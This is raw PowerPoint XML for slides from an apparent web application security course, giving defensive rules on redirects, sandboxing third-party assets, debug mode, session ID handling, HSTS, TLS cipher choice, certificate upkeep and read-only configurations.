        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24753919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13 (A10)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t use unsafe user-supplied data to construct re-directs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Redirect to malware site</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22527277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14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid “foreign” assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ads (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malvertising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any assets residing on a different site (JavaScript, Flash, videos, etc.) and “pulled” into your web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you have these, be careful!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Accept only from reputable sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolate to a sandboxed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sandbox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://suspect.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1579139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Face of Attacks - 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The high dollar payoff results in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>of “better” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More vigorous research into flaws, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Published lists of “known” flaws and how to capitalize on them</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32159336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15</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure DEBUGGING is turned “off”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Production should NOT run in debug mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provides too much feedback</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can disclose program logic, variables, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is extremely helpful to attackers during RECON phase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30924087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16</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1295400"/>
            <a:ext cx="8153400" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Establish new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> whenever authorization level of user changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authorization changes at LOGIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authorization changes at LOGOUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any other time authorization changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DESTROY old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – don’t let it “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>hang around”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpSession.invalidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()” (J2EE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Session.Abandon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Response.Cookies.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…)” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ASP .NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session_regenerate_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(true)” (PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DON’T use identifiable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionIDs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35581057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Rule #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>17</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every “authenticated” page needs to have a “logout” or “logoff” link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clicking this link will destroy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc., and generate a new “unauthorized” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26193756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Rule #18</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Strict Transport Security (HSTS) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forces connection to remain HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can defeat “downgrade” to HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HSTS header: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strict-Transport-Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: max-age=31536000; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>includeSubDomains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>preload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Caveat: Will not talk to sites with invalid or expired cert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Caveat: attacker may defeat if first visit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25307498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Infrastructure Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Things usually – but not always - out of developer’s control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27548159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Infrastructure Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A9++) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keep all software up-to-date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Current releases and patch levels of OS, web server, application server, JAVA, frameworks,  etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The more “behind” you are on patches and releases, the MORE KNOWN holes there are in your system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HP: 44% of breaches in 2014 leveraged old vulnerabilities (2-4 years old) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6660184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Rule #2 (A5,A6) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use TLS instead of SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preferably TLS 1.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>strong ciphers – AES 128 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>better</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Bigger is MOSTLY* better”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REMOVE ALL WEAKER METHODS FROM LIST OF CIPHER SUITES to ensure that nobody – like an attacker – causes “downshift to insecurity”.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Say </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“bye-bye” to DES - 56, 112, and 168(“3DES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No longer FIPS recommended; less secure – DUMP IT IF YIOU SEE IT!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38786545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#2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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0038" y="1371600"/>
            <a:ext cx="6002337"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6483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#3 (A5) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>your certs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>up-to-date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expired </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>certificates (should) cause consternation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can train them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>habits – “I Understand the Risks” – but DO they???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33755325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#4 (Ax++) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read-only is (or could be) your friend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Covers MANY of the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>op Ten”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Block “back doors”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Block privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Block web-site defacement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3751159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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
